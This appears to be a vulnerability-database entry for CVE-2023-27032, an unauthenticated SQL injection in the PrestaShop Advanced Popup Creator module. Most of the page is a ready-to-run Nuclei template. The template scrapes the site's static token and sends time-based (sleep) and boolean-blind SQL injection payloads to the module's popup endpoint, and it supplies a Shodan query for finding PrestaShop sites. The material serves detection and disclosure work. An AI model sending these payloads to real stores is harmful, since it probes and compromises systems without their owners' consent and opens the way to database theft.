CVE-2023-27032: PrestaShop AdvancedPopupCreator - SQL Injection

日期: 2025-08-01 | 影响软件: PrestaShop AdvancedPopupCreator | POC: 已公开

漏洞描述

In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.

PoC代码[已公开]

id: CVE-2023-27032

info:
  name: PrestaShop AdvancedPopupCreator - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
  reference:
    - https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
    - https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27032
    cwe-id: CWE-89
    epss-score: 0.38387
    epss-percentile: 0.97072
    cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: idnovate
    product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate,vuln

flow: |
  http(1) && (http(2) || http(3))

http:
  - id: "extract_values"
    raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 5

    extractors:
      - type: regex
        name: time
        group: 1
        regex:
          - '"time":([0-9]+),'
        internal: true

      - type: regex
        name: token
        group: 1
        regex:
          - '"static_token":"([0-9a-z]+)",'
        internal: true

  - id: "time_based"
    raw:
      - |
        @timeout 20s
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

      - |
        @timeout 20s
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F

    stop-at-first-match: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body,'hasError')
          - duration >= 6
        condition: and

  - id: "blind_based"
    raw:
      - |
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

      - |
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

    matchers:
      - type: dsl
        name: blind-based
        dsl:
          - 'status_code == 200'
          - 'contains(tolower(response_1), "selector")'
          - '!contains(tolower(response_2), "selector")'
        condition: and
# digest: 4b0a00483046022100cc319afa74558f9c3d4ee3894a9b3485b00d95b23ef43dab437d5cda663bbf3b022100c2cf8963adfe6e72effb8f9c80551ba2809bdba97a27322507c7cb5f75d0a1c3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐